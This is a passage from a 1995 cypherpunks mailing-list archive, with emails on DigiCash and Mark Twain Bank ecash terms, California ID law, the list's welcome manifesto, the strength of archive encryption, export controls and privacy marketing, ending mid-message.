To: dsmith@midwest.net (David E. Smith)
Subject: Re: Hack DigiCash: Payee Anonymity
In-Reply-To: <199510251759.MAA01488@cdale1.midwest.net>
Message-ID: <199510251851.LAA24113@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	As if that would help. I wrote on Monday and have received no
response. (I asked about the pricing structure and the difference
between merchant and non-merchant accounts.)

	Has anyone received a reply from ftrotter?

> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> >This is for a "WorldCurrency Access Interest Account", which I don't
> >think is what is used for ecash.  For ecash the account opening fee is
> >$11 and the per-month fee is $5.  I don't see any reference to required
> >account minimums.
> 
> Aha.  That's where I got the $11 figure from.  I suppose I should
> try actually _reading_ all the fine print :)
> 
> IANAL, but then I never claimed to be.
> 
> I'll be writing to Mark Twain's contact ("ftrotter@marktwain.com")
> and try to figure out just what the deal is.
> 
> Dave
> - ----- David E. Smith, "dsmith@midwest.net", PGP ID 0c92732139
> http://www.midwest.net/scribers/dsmith/
> Sorry, the full signature is being interrogated by news.admin.net-abuse.misc
> 
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> iQCVAwUBMI5y7AwyfvCScyE5AQEn7wQAoUT/6fBZcUSM5eT7HYnY0Tx5Q35Q4aeB
> a2lTJWnMRta5i16qCtKF/0OiK/9bfs0i3FQqUMpireXp7YZn5n0D83mr+AWuJZBc
> +0170zWpsVZElAoZU8ZPV06PDQwuraH2pmdBMt9Kfabi4w4BGbqJ3E4rYvhx95dj
> hWnAp+6RzJg=
> =IM+h
> -----END PGP SIGNATURE-----
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 25 Oct 95 09:20:01 PDT
To: Ian Goldberg <iang@cory.EECS.Berkeley.EDU>
Subject: Re: Mandatory ID in California?
Message-ID: <199510251617.MAA23789@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:45 AM 10/25/95 -0700, Ian Goldberg wrote:

>"The officer, in accordance with police policy, arrested Burton
>for refusing to properly identify himself."
><snip>
>
>That last sentence seemed ominous to me...

This has been chatted about for years.  Under California law, failure to
identify yourself is a minor violation.  They always dismiss the next day at
your hearing.  You don't have to carry ID, you just have to identify
yourself (there's a difference).  "my name Jose Jimenez."  You still don't
need ID unless you are operating a motor vehicle on public streets and roads
(or maybe catching a plane).

DCF

"The average seasoned citizen pays a higher percentage of his income for
medical expenses today than he did in 1964 before the passage of Medicaid."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Majordomo@toad.com
Date: Wed, 25 Oct 95 12:18:03 PDT
To: cypherpunks@toad.com
Subject: Welcome to cypherpunks
Message-ID: <9510251917.AA27873@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


--

Welcome to the cypherpunks mailing list!

If you ever want to remove yourself from this mailing list,
you can send mail to "Majordomo@toad.com" with the following command
in the body of your email message:

    unsubscribe cypherpunks cypherpunks@toad.com

Here's the general information for the list you've
subscribed to, in case you don't already have it:



About cypherpunks
-----------------

I. Administrivia (please read, boring though it may be)

The cypherpunks list is a forum for discussing personal defenses for
privacy in the digital domain.  It is a high volume mailing list.  If
you don't know how to do something, like unsubscribe, send mail to

	majordomo@toad.com

and the software robot which answers that address will send you back
instructions on how to do what you want.  If you don't know the
majordomo syntax, an empty message to this address will get you a help
file, as will a command 'help' in the body.  Even with all this
automated help, you may still encounter problems.  If you get really
stuck, please feel free to contact me directly at the address I use
for mailing list management:

	cypherpunks-owner@toad.com

Please use this address for all mailing list management issues.  Hint:
if you try to unsubscribe yourself from a different account than you
signed up for, it likely won't work.  Log back into your old account
and try again.  If you no longer have access to that account, mail me
at the list management address above.

For other questions, my list management address is not the best place,
since I don't read it every day.  To reach me otherwise, send mail to

	eric@remailer.net

This address is appropriate for emergencies (and wanting to get off
the list is never an emergency), such as the list continuously spewing
articles.  Please don't send me mail to my regular mailbox asking to
be removed; I'll just send you back a form letter.

Do not mail to the whole list asking to be removed.  It's rude.  The
-request address is made exactly for this purpose.

To post to the whole list, send mail to

	cypherpunks@toad.com

If your mail bounces repeatedly, you will be removed from the list.
Nothing personal, but I have to look at all the bounce messages.

There is no digest version available.

There is an announcements list which is moderated and has low volume.
Announcements for physical cypherpunks meetings, new software and
important developments will be posted there.  Mail to

	cypherpunks-announce-request@toad.com

if you want to be added or removed to the announce list.  All
announcements also go out to the full cypherpunks list, so there is no
need to subscribe to both.


II. About cypherpunks

The cypherpunks list is not designed for beginners, although they are
welcome.  If you are totally new to crypto, please get and read the
crypto FAQ referenced below.  This document is a good introduction,
although not short.  Crypto is a subtle field and a good understanding
will not come without some study.  Please, as a courtesy to all, do
some reading to make sure that your question is not already frequently
asked.

There are other forums to use on the subject of cryptography.  The
Usenet group sci.crypt deals with technical cryptography; cypherpunks
deals with technical details but slants the discussion toward their
social implications.  The Usenet group talk.politics.crypto, as it
says, is for political theorizing, and cypherpunks gets its share of
that, but cypherpunks is all pro-crypto; the debates on this list are
about how to best get crypto out there.  The Usenet group
alt.security.pgp is a pgp-specific group, and questions about pgp as
such are likely better asked there than here.  Ditto for
alt.security.ripem.

The cypherpunks list has its very own net.loon, a fellow named L.
Detweiler.  The history is too long for here, but he thinks that
cypherpunks are evil incarnate.  If you see a densely worded rant
featuring characteristic words such as "medusa", "pseudospoofing",
"treachery", "poison", or "black lies", it's probably him, no matter
what the From: line says.  The policy is to ignore these postings.
Replies have never, ever, not even once resulted in anything
constructive and usually create huge flamewars on the list.  Please,
please, don't feed the animals.


III. Resources.

A. The sci.crypt FAQ

anonymous ftp to rtfm.mit.edu:pub/usenet-by-group/sci.crypt

The cryptography FAQ is a good online intro to crypto.  Very much worth
reading.  Last I looked, it was in ten parts.

B. cypherpunks ftp site

anonymous ftp to ftp.csua.berkeley.edu:pub/cypherpunks

This site contains code, information, rants, and other miscellany.
There is a glossary there that all new members should download and
read.  Also recommended for all users are Hal Finney's instructions on
how to use the anonymous remailer system; the remailer sources are
there for the perl-literate.

C. Bruce Schneier's _Applied Cryptography_, published by Wiley

This is required reading for any serious technical cypherpunk.  An
excellent overview of the field, it describes many of the basic
algorithms and protocols with their mathematical descriptions.  Some
of the stuff at the edges of the scope of the book is a little
incomplete, so short descriptions in here should lead to library
research for the latest papers, or to the list for the current
thinking.  All in all, a solid and valuable book.  It's even got
the cypherpunks-request address.


IV. Famous last words

My preferred email address for list maintenance topics only is
hughes@toad.com.  All other mail, including emergency mail, should go
to hughes@ah.com, where I read mail much more regularly.

Enjoy and deploy.

Eric

-----------------------------------------------------------------------------

Cypherpunks assume privacy is a good thing and wish there were more
of it.  Cypherpunks acknowledge that those who want privacy must
create it for themselves and not expect governments, corporations, or
other large, faceless organizations to grant them privacy out of
beneficence.  Cypherpunks know that people have been creating their
own privacy for centuries with whispers, envelopes, closed doors, and
couriers.  Cypherpunks do not seek to prevent other people from
speaking about their experiences or their opinions.

The most important means to the defense of privacy is encryption. To
encrypt is to indicate the desire for privacy.  But to encrypt with
weak cryptography is to indicate not too much desire for privacy.
Cypherpunks hope that all people desiring privacy will learn how best
to defend it.

Cypherpunks are therefore devoted to cryptography.  Cypherpunks wish
to learn about it, to teach it, to implement it, and to make more of
it.  Cypherpunks know that cryptographic protocols make social
structures.  Cypherpunks know how to attack a system and how to
defend it.  Cypherpunks know just how hard it is to make good
cryptosystems.

Cypherpunks love to practice.  They love to play with public key
cryptography.  They love to play with anonymous and pseudonymous mail
forwarding and delivery.  They love to play with DC-nets.  They love
to play with secure communications of all kinds.

Cypherpunks write code.  They know that someone has to write code to
defend privacy, and since it's their privacy, they're going to write
it.  Cypherpunks publish their code so that their fellow cypherpunks
may practice and play with it.  Cypherpunks realize that security is
not built in a day and are patient with incremental progress.

Cypherpunks don't care if you don't like the software they write. 
Cypherpunks know that software can't be destroyed.  Cypherpunks know
that a widely dispersed system can't be shut down.

Cypherpunks will make the networks safe for privacy.

[Last updated Mon Feb 21 13:18:25 1994]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@midwest.net>
Date: Wed, 25 Oct 95 10:30:39 PDT
To: cypherpunks@toad.com
Subject: Re: Hack DigiCash: Payee Anonymity
Message-ID: <199510251759.MAA01488@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>This is for a "WorldCurrency Access Interest Account", which I don't
>think is what is used for ecash.  For ecash the account opening fee is
>$11 and the per-month fee is $5.  I don't see any reference to required
>account minimums.

Aha.  That's where I got the $11 figure from.  I suppose I should
try actually _reading_ all the fine print :)

IANAL, but then I never claimed to be.

I'll be writing to Mark Twain's contact ("ftrotter@marktwain.com")
and try to figure out just what the deal is.

Dave
- ----- David E. Smith, "dsmith@midwest.net", PGP ID 0c92732139
http://www.midwest.net/scribers/dsmith/
Sorry, the full signature is being interrogated by news.admin.net-abuse.misc


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMI5y7AwyfvCScyE5AQEn7wQAoUT/6fBZcUSM5eT7HYnY0Tx5Q35Q4aeB
a2lTJWnMRta5i16qCtKF/0OiK/9bfs0i3FQqUMpireXp7YZn5n0D83mr+AWuJZBc
+0170zWpsVZElAoZU8ZPV06PDQwuraH2pmdBMt9Kfabi4w4BGbqJ3E4rYvhx95dj
hWnAp+6RzJg=
=IM+h
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Wed, 25 Oct 95 09:30:04 PDT
To: cypherpunks@toad.com
Subject: Re: Mark Twain Bank (was: Anonymity: A Modest Proposal)
In-Reply-To: <199510250551.WAA29912@netcom12.netcom.com>
Message-ID: <9510251629.AA11820@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>1.  Both parties stipulate that their relationship is a 
>    business relationship and not a fiduciary relationship.

Perhaps someone with US legal experience might care to comment 
on the enforceability of such a clause. Surely the nature of
the relationship is defined by its character and not solely by
a contract disclaimer.

>2.  Your account is not FDIC insured. 

Good luck then!

>3.  The bank accepts no liability for anything going wrong, 
>    although it may, at its sole option, attempt to make
>    amends.

Wouldn't it be convenient if such clauses were enforceable?

>4.  Parties agree to waive a jury trial.
>
>5.  Parties agree to binding arbitration. 

These seem pretty dangerous to me if enforceable. They would 
effectively usurp the power of the courts as arbiter. Although
I have less confidence in the competence of a jury than that
of judges I'm pretty sure that the UK courts would consider
such contract clauses in a dim light.

>6.  General waffling to the effect that the tiny fees collected
>    imply an equally tiny responsibility and potential liability
>    on the part of the bank.  

Hmm, wanna bet?


This is not a commercial contract between businesses; it is clearly 
offering a consumer service. It is not the result of informed
negotiation between sides armed with lawyers, it is a very one sided
contract. This brings up a major problem with Chaum's schemes,
there has to be trust in the financial institution. Contracts such
as this do not inspire confidence. Mark Twain bank have a
confidence problem in any case, when I mentioned their name
as DigiCash licensees to an audience yesterday they laughed.

>One wonders whether signing away all responsibility on the part of
>the bank is going to be the standard for using digital money
>on the Internet, or whether consumers will demand protection
>when using these new services.  

Consumers have votes, they are not afraid of regulation. Forget
the pap you see spouted by politicians about deregulation, they
simply mean remove the regulations that negatively affect our 
interests, their supporters are likewise. 

It is ironic that the Credit card cos biggest advantage in 
cyberspace and other mail order turns out to be the $50 limit 
on consumer exposure to loss. This is another side of regulation
E that people don't mention so often.

Let's wait a while and see how long it takes for the Fed to ring
up "dear boy, we have a few questions....".


		Phill



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathon Fletcher <jonathon@doemail.sbi.com>
Date: Tue, 24 Oct 95 20:34:49 PDT
To: cypherpunks@toad.com
Subject: Quick commercial package question
Message-ID: <Pine.SUN.3.91.951025122602.8492M-100000@doe905f>
MIME-Version: 1.0
Content-Type: text/plain



Just a brief question.

  There's a compression/archiving package on the Mac called Stuffit. It
comes in the usual Lite (get free then register) and Deluxe (money first,
product later) flavours. It offers, amongst its options, an encryption
option on a 'per archive entry'. This means you can have an archive with a
mix of encrypted and unencrypted files and folders, all in the same
archive. 

  Question is - does anyone know anything about the strength or
trustability of the encryption algorithm used ? It's freely exportable
from the US (or so I thought) so it can't be DES. Is it (down) on a level
with the MS Word or Wordperfect ciphers, or is it a little better ? How
far should I trust it ? 

-Jon

--
  Jonathon Fletcher,        "these opinions are my own, no-one else's"
  jonathon@japan.sbi.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 25 Oct 95 09:53:17 PDT
To: Michael Froomkin <froomkin@law.miami.edu>
Subject: Re: CJR returned to sender
In-Reply-To: <Pine.SUN.3.91.951025100419.15559D-100000@viper.law.miami.edu>
Message-ID: <199510251652.MAA08998@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Michael Froomkin writes:
> I agree strongly with Tim May that this (fun) little joke has gone far
> enough.  I enjoyed it while it lasted, but the CJR was clearly frivolous,
> the T-Shirt was clearly not a munition, IMHO, and that's that.  Write up
> the experience, post it on the web somewhere (I'll provide a space if you
> need it), and call it a day. 

I was unaware, Mr. Froomkin, that the legal system of our country had
the right to arbitrarily ignore its own rules and refuse to answer a
question. The munitions T-Shirt was not, in my opinion, substantially
more frivolous than Phil Karn's floppy, which was rejected. I do not
believe that the state department has the right to reject such things
by refusing to accept their mail, and I do not believe that they have
the right to violate their own procedures. If someone asks "is this
captain midnight decoder ring exportable" they are legally obligated
to answer, one way or the other, unless we live under a government of
men, and not laws.

Perry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Wed, 25 Oct 95 10:59:24 PDT
To: perry@piermont.com
Subject: Re: Reformated: How secure....
In-Reply-To: <199510242307.TAA07020@jekyll.piermont.com>
Message-ID: <199510251759.NAA26251@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" writes:
>Amateurs pretending that they are professionals going out and selling
>snake-oil crypto are one of the biggest threats in our business.

and then...

>I suspect it would take a real cryptographer very little effort to
>break your system, but that no one will bother doing so because it
>isn't really worth anyone's time.

Well, Perry, if it's really such a threat, isn't it worth someone's
time to combat it?

Wasn't that point driven home by the Netscape PRNG problems?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Wed, 25 Oct 95 10:25:00 PDT
To: asb@nexor.co.uk (Andy Brown)
Subject: Re: Does your software?
In-Reply-To: <Pine.SOL.3.91.951025132835.16584C-100000@eagle.nexor.co.uk>
Message-ID: <9510251721.AA00948@all.net>
MIME-Version: 1.0
Content-Type: text


> 
> On Tue, 24 Oct 1995, Dr. Frederick B. Cohen wrote:
> 
> > Actually, not true.  The global fixed-length buffers, shared variables,
> > and lack of prototypes provide protection against allocation problems
> > which sould result in denial of service, corruptions at near-capacity
> > load, and other similar security problems.
> 
> Please explain how a lack of prototypes (and shared variables for that 
> matter) provide protection against the problems you describe.

The design of the server is documented in a white paper stored in our
W3 server.  Look under the URL below and select:

	Management Analytics -> Software -> Daemons -> White Paper

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nagina.cs.colorado.edu>
Date: Wed, 25 Oct 95 12:30:11 PDT
To: hallam@w3.org
Subject: Re: Mark Twain Bank (was: Anonymity: A Modest Proposal)
In-Reply-To: <9510251629.AA11820@zorch.w3.org>
Message-ID: <199510251929.NAA19138@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 An entity calling itself "Phil <hallam@w3.org>" allegedly wrote:
>
> Perhaps someone with US legal experience might care to comment 
          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> on the enforceability of such a clause.


That's not me, but I have some things to say anyway.  If I could
figure out how to make DigiCash's SunOS client write money into
ASCII files I would attach 2 cybercents to the end of this.


> Surely the nature of
> the relationship is defined by its character and not solely by 
> a contract disclaimer.


I prefer to think that contractual relationships are defined by
the explicit stipulations of the contract, and the implicit understandings
between the two parties (which are unavoidable, since they begin at
the semantic or even cognitive level and cannot be described
explicitly with our current science/tech, but which should be made
explicit wherever possible), and are completely *un*-influenced by
the arbitrary opinion of some third organization which happens to
own lots of big guns in their geographical regions.


> >3.  The bank accepts no liability for anything going wrong, 
> >    although it may, at its sole option, attempt to make
> >    amends.
> 
> Wouldn't it be convenient if such clauses were enforceable?


Wouldn't it be nice if whatever clauses two competent entities agreed
to were enforceable?  (non-repudiation, reputations, Nick
Szabo's "liens"...)


> >4.  Parties agree to waive a jury trial.
> >
> >5.  Parties agree to binding arbitration. 
> 
> These seem pretty dangerous to me if enforceable. They would 
> effectively usurp the power of the courts as arbiter.


Indeed they do usurp that power, don't they?  :-)  <I smile happily.>
And it's only going to get worse(/better).  ((anon)nymity, e-cash, tax 
evasion, black markets...)


> Although
> I have less confidence in the competence of a jury than that
> of judges I'm pretty sure that the UK courts would consider
> such contract clauses in a dim light.


And I, by way of contrast, consider such clauses, which remove
business relationships from the realm of violence and into the realm
of mutually consensual, organizationally emergent social structures, 
in a very positive light.


> Consumers have votes, they are not afraid of regulation. Forget
> the pap you see spouted by politicians about deregulation, they
> simply mean remove the regulations that negatively affect our 
> interests, their supporters are likewise. 


And I'm of the opinion that any "regulation" (i.e. threat of force
against peaceful parties) negatively affects my interests (all of
ours) in the long run.  And I too have a vote.


Crypto relevance?  Much!  The overview is that crypto tech will
ultimately enable my view of ideal social structure rather than
yours.  Non-repudiation, e-cash, Nick Szabo's "liens", tax evasion,
black markets, (anon)nymity, reputations and (hopefully hopefully) 
the education/enlightenment of the populace because of powerful
non-censorable information access all point this way.


Of course, it will be a long, twisted road from here to there (we
live in interesting times), but I am ultimately hopeful.


I hope this rant is not wholly without value.  I do it rarely, so 
you are safe for another few months now that I have it out of my 
system.


Regards,

Bryce

signatures follow


            "To strive, to seek, to find and not to yield."   
    <a href="http://ugrad-www.cs.colorado.edu/~wilcoxb/Niche.html">

                          bryce@colorado.edu                   </a>



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMI6P9/WZSllhfG25AQHl9wQAmOWc0PiNbeKaT0Ow1d63g5bdQ2A0417D
nXlv3T4olwymwTiB3oWv4t28LPIkKwl2dCm6xLduk1+8z5t7rwZCUYRc91t7ro58
8y6yZOvSRvupKm9IUu5l/Nhmd2uv4TpHQKq11UfCaxUmXdxeZ8AS5RrB1uq51BUM
ctATwNuH08c=
=WJ/H
-----END PGP SIGNATURE-----

From owner-cypherpunks  Wed Oct 25 12:30:03 1995
Return-Path: <owner-cypherpunks>
Received: by toad.com id AA28197; Wed, 25 Oct 95 12:30:03 PDT
Received: from larry.infi.net by toad.com id AA28174; Wed, 25 Oct 95 12:29:42 PDT
Received: by larry.infi.net (Infinet-S-3.3)
	id PAA04999; Wed, 25 Oct 1995 15:29:21 -0400
Date: Wed, 25 Oct 1995 15:29:20 -0400 (EDT)
From: Alan Horowitz <alanh@infi.net>
To: Duncan Frissell <frissell@panix.com>
Cc: Ian Goldberg <iang@cory.EECS.Berkeley.EDU>, cypherpunks@toad.com
Subject: Re: Mandatory ID in California?
In-Reply-To: <199510251617.MAA23789@panix.com>
Message-Id: <Pine.SV4.3.91.951025152409.3136C-100000@larry.infi.net>
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-cypherpunks@toad.com
Precedence: bulk

"States may not authorize arrest...for failing to produce identification..."
       Kolender v. Lawson 461 U.S. 352 (1983)

"...may not compel an answer and they must allow the person to leave 
after a reasonable brief period of time...."  - - ibid


California is the Ninth Circuit, no?  See, inter alia,  Martinelli v. 
City of Beaumont, 820 F.2nd 1491 (1987).

Alan Horowitz
alanh@infi.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <asb@nexor.co.uk>
Date: Wed, 25 Oct 95 06:33:11 PDT
To: cypherpunks@toad.com
Subject: Re: Does your software?
In-Reply-To: <9510241747.AA02533@all.net>
Message-ID: <Pine.SOL.3.91.951025132835.16584C-100000@eagle.nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 24 Oct 1995, Dr. Frederick B. Cohen wrote:

> Actually, not true.  The global fixed-length buffers, shared variables,
> and lack of prototypes provide protection against allocation problems
> which sould result in denial of service, corruptions at near-capacity
> load, and other similar security problems.

Please explain how a lack of prototypes (and shared variables for that 
matter) provide protection against the problems you describe.


- Andy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Wed, 25 Oct 95 10:25:56 PDT
To: cypherpunks@toad.com
Subject: [NOISE] Re: BlackNet in "Hardware"
Message-ID: <9510251725.AA25057@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> I recollect that the Amiga had some gizmo--I think it was called
> "MagicSack" or something like that--that let it run Macintosh programs,
> sort of. It never really caught on, at least as an alternative to real
> Macs. And I think something similar was available for DOS. This was all
> several years back, before the Amiga faded out.
> 
> Amiga users and former Amiga users can probably tell us more.
> 
> --Tim May

The Amiga 2000 had two sets of slots - one for amiga-specific cards,
and one for PC cards. Some of these slots lined up, and you could 
slip in a 'Bridgeboard' which carried an Intel processor.  It could
access the PC slots, the amiga IO, and had its own disk partitions. 
There were mechanisms for the two processors to exchange data as 
well.

I *think* there was a similar MAC product as well, or at least a board
which could carry MAC ROMs, and used the Amiga 68000 processor.

So the answer is: yes, the Amiga could do that. It also had long
filenames, thousands of colors, true preemptive multitasking, stereo
sound, a DSP coprocessor, and many other neat features years before
they were available on other consumer systems, as well as display
quality and features still unavailable on any system even near its 
pricepoint.

But - Commodore's marketing department couldn't sell ice in the
Sahara.

I'll stop now, or I'll start mourning for TOPS-20 as well...


Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: todd@lgt.com (Todd Glassey)
Date: Wed, 25 Oct 95 13:33:34 PDT
To: "WWW-Buyinfo" <cypherpunks@toad.com
Subject: Re: Privacy Marketing
Message-ID: <v02110107acb44bce2ca1@[204.156.156.4]>
MIME-Version: 1.0
Content-Type: text/plain


>         Reply to:   RE>Privacy Marketing
>
>Nick -
>
>I read your well-reasoned and articulate post just after sending my own (much
>less complete) one which largely contradicts your view.
>
>Either future is plausible.  I think the key issue here is risk.  The
>commercial market for transaction detail exists today.  Call it a mature
>industry.  The market for individual digital privacy has been identified at a
>general level, but, as you point out, has not exactly crystallized.  Call it
>an embryonic industry.
>
>Does the former need to die in order for the latter to gain ground?  Probably
>not.  There's a lot of mutual dependence here.  Each needs the other to be
>relevant - kind of a Yin/Yang thing.  Depending upon how the regulatory
>environment shapes up, it may be quite possible that both are thriving
>businesses in the future, with transaction service providers enjoying revenue
>streams from both selling data and selling anti-data (privacy).   Look at
>Caller ID and Caller ID Blocking services for an historical precedent.
>
>- Art
>
>
>Art Hutchinson                                        E-mail:
>hutchinson@ncri.com
>Senior Consultant                                        Phone: (617) 654-0635
>Northeast Consulting Resources, Inc.        FAX: (617) 654-0654
>One Liberty Square                                     WWW: http://www.ncri.com
>Boston, MA 02160

This dovetails into a conversation currently going on inside the
cypherpunks alias, here is a reply I posted to a query about Transaction
Models, and security or anonymous status of the transaction initiator or
closer.


--- Snip ---


>I must disagree here and side with *gasp* FC.

Ughhh, Me too..., Dr. Fred scores 2 Points!

>If your so called *secure* server happens to get broken into by grace of
>god, you want to know at least where the attack came from. If Netscape
>wants to hide internet hostnames they would do well setting up two DNS
>servers, one for internal resolutions where IPs resolve to their real
>hostname, and one in front of the firewall that resolves all IP's to
>unkown.netscape.com.


I think there are really two bigger conceptual issues up for bashing about
here, and they are different. It is unlikely that they can be by the same
protocol... They both are valid transaction models and must be met.

The one - Authentication Based transactions, i.e. I am doing *stuff* from a
"known" system or "authenticated channel". These transactions are based
upon a level of trust that I say I am who I am and that my "resources" are
as they are portrayed to be. Clearly there is an electronic trail generated
here. This is the "credit card" model.

and

The other, -  What I now call "Unauthenticated transactions" are based upon
the actual resource's being authenticated rather than myself being
authenticated.

-----

Hence if you follow this model to extrapolate that these two types of
"environments" exist, that of "known and trusted users" and that of
"unknown users, but trusted cash". They are in and of itself what will
drive the need to both collect and enforce privacy for both types of
transactions.

IMHO - Anything less just won't fly long term. This concept of collecting
client data has to be a part of the "Known Entity" Transaction Models and
relegated to stay within that context. "Unknown Entity" transaction
processing will have to be made available as well with anonymity being
insured as part of the process model.


Todd





Regards,

T. S. Glassey
Chief Technologist
Looking Glass Technologies
todd@lgt.com

(415) 324-4318


-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQB1AwUBMFu5E6gNRnWhagU5AQHI+gL+Mwpcd3lAWd8FF06qcG6rnLhIYveHW71a
XC7xh1T0uu8qnYX31yMp17OG28jWpKUbWec1IM9/eXOi+gInA7rKICWczV8zo9Z0
0puxjRRN7yO4KfRb3cPpk+r0p6pDg01Y
=bTYb
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 25 Oct 95 11:14:27 PDT
To: Scott Brickner <sjb@universe.digex.net>
Subject: Re: Reformated: How secure....
In-Reply-To: <199510251759.NAA26251@universe.digex.net>
Message-ID: <199510251814.OAA09113@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Scott Brickner writes:
> "Perry E. Metzger" writes:
> >Amateurs pretending that they are professionals going out and selling
> >snake-oil crypto are one of the biggest threats in our business.
> 
> and then...
> 
> >I suspect it would take a real cryptographer very little effort to
> >break your system, but that no one will bother doing so because it
> >isn't really worth anyone's time.
> 
> Well, Perry, if it's really such a threat, isn't it worth someone's
> time to combat it?
> 
> Wasn't that point driven home by the Netscape PRNG problems?

Netscape is in wide use. If a substantial number of people bothered to
use the Privsoft, then it might be worth breaking it. As it stands, I
don't think it's worth my while. Maybe someone out there wants to
bother to do it as an exercise. It unfortunately has a bit of added
complexity because you have to learn a bit about image statistics in
order to do a good job of segregating the images, but it also looks
like you might be able to use multiple anagramming to get a nice
handle on the thing so your statistics don't have to be particularly
good.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 25 Oct 95 11:18:17 PDT
To: cypherpunks@toad.com
Subject: Re: arg
In-Reply-To: <199510251801.TAA27975@utopia.hacktic.nl>
Message-ID: <199510251818.OAA09128@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Why do you care, Mr. Anonymous? Most of the message was on
cryptography, and if he wants to put in a .signature that happens to
slam the idiocy of our semi-socialist government, well, let him. You
can put in .signatures that praise it if you like. Just keep most of
the message on topic.

Anonymous writes:
> Frissell:
> 
> "The average seasoned citizen pays a higher percentage of his income for
> medical expenses today than he did in 1964 before the passage of Medicaid."
> 
>       Do you set aside a quiet hour every day to think up this crap?
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 25 Oct 95 11:34:14 PDT
To: cypherpunks@toad.com
Subject: (www-b) (fwd) Privacy Marketing
Message-ID: <v02120d03acb4335bba19@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


Nick's on a roll now...

Cheers,
Bob Hettinga



--- begin forwarded text

From: szabo@netcom.com (Nick Szabo)
Subject: Privacy Marketing
To: philipw.nrd@cbo.gov (PHILIP WEBRE)
Date: Wed, 25 Oct 1995 09:26:23 -0700 (PDT)
Cc: www-buyinfo@allegra.att.com
Mime-Version: 1.0


Most Internet businesses, especially the Web software and
payment systems providers, are severely underestimating the market
for privacy features that is out there.  Consider:

* A recent general survey showed that 83% of Americans are very
concerned about their privacy on the "Information Superhighway".
One can expect even stronger figures from European customers, which
have more first-hand experience with private data, much of it
originally compiled for innocuous reasons, being used for
political repression.  The vast majority of our customers are
concerned about privacy.

* Marketing surveys on privacy that are both detailed and accurate
are hard to come by, because customers who care more about their privacy
tend to dislike filling out detailed forms (even if they claim to be
anonymous).

* Over half the BBS, and potentially the Internet, online service market
is in controversial services, where customers are even more concerned
about privacy than average.

* Privacy, once considered merely a political issue, is now being recognized
for its more important aspect, as a market differentiator and value-add.
Marketers correctly recognize that government "privacy regulations" mean
much less privacy for businesses if it is to be enforced, and the voters no
longer expect such laws to have any teeth in the face of modern
technology.  That hardly means that customers are not concerned about it, as
the numbers show.  The alternative to regulation is market solutions.
Recognize that many customers do want privacy, give them what they want,
and contrast yourself to your competitor. Making visible the ways your
competitor is violating their customers' privacy will become a powerful
marketing strategy.  This strategy was used rather timidly, and inaccurately,
by AT&T against MCI, where it nevertheless had great success.  (Inaccurate
because all major phone companies compile lists of who calls whom,
and use them for marketing as well as billing -- MCI was simply being more
honest about it).  Used boldly and accurately, privacy marketing has
vast potential to upset competitors who rely too much on marketing
data and not enough on empathy with the human customer.  For an idea
of what such a marketing campaign might be like, imagine combining
Apple "1984" Mac ads, one of the most effective campaigns in history,
with the AT&T vs. MCI campaign, to sell products and services that
in fact do protect customer privacy where the competition does not.

* Most Americans do _not_ participate in frequent flier and similar
customer tracking programs.  Many who do participate don't realize
the extent to which their lifestyle is tracked, since these actions
